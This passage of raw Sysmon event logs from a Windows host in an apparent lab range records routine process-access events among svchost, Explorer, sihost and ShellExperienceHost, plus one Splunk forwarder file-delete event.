12:02:28.767{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006423Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.767{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006422Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.767{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006421Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.751{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006420Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.751{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006419Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.751{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006418Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.751{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006417Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.642{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000006416Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.642{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D7895657F2881B50E61279DF2BF0E137,SHA256=2EE53E1B6C2DD7C98D0B28C02C8794847154192B6E430F3253FB402B6FAF1BF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000006415Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.626{266CAFBE-64C4-6064-9C00-00000000AE01}46204872C:\Windows\system32\sihost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\twinui.appcore.dll+72b5|C:\Windows\System32\twinui.appcore.dll+564d|C:\Windows\System32\twinui.appcore.dll+4d5e|C:\Windows\system32\activationmanager.dll+8469|C:\Windows\system32\activationmanager.dll+b6c7|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000006414Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.626{266CAFBE-64C4-6064-9C00-00000000AE01}46204872C:\Windows\system32\sihost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\twinui.appcore.dll+684b|C:\Windows\System32\twinui.appcore.dll+564d|C:\Windows\System32\twinui.appcore.dll+4d5e|C:\Windows\system32\activationmanager.dll+8469|C:\Windows\system32\activationmanager.dll+b6c7|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000006413Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.626{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006412Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.626{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006411Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.626{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6d1f|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+68be|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6966|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6ab5|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x80000000000000006410Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.626{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d4e3|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d7a9|C:\Windows\System32\TwinUI.dll+ba500|C:\Windows\System32\TwinUI.dll+b9e0e|C:\Windows\System32\TwinUI.dll+badc3|C:\Windows\System32\TwinUI.dll+bae62|C:\Windows\System32\TwinUI.dll+137c27|C:\Windows\System32\TwinUI.dll+1385af|C:\Windows\System32\TwinUI.dll+139427|C:\Windows\System32\TwinUI.dll+d2084|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006409Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.626{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba500|C:\Windows\System32\TwinUI.dll+b9e0e|C:\Windows\System32\TwinUI.dll+badc3|C:\Windows\System32\TwinUI.dll+bae62|C:\Windows\System32\TwinUI.dll+137c27|C:\Windows\System32\TwinUI.dll+1385af|C:\Windows\System32\TwinUI.dll+139427|C:\Windows\System32\TwinUI.dll+d2084|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006408Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.626{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba500|C:\Windows\System32\TwinUI.dll+b9e0e|C:\Windows\System32\TwinUI.dll+badc3|C:\Windows\System32\TwinUI.dll+bae62|C:\Windows\System32\TwinUI.dll+137c27|C:\Windows\System32\TwinUI.dll+1385af|C:\Windows\System32\TwinUI.dll+139427|C:\Windows\System32\TwinUI.dll+d2084|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006407Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.626{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12a3cc|C:\Windows\System32\TwinUI.dll+b60d4|C:\Windows\System32\TwinUI.dll+b1e1b|C:\Windows\System32\TwinUI.dll+d206a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006406Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.611{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006405Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.611{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006404Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.611{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006403Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.611{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006402Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.611{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000006401Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.611{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovide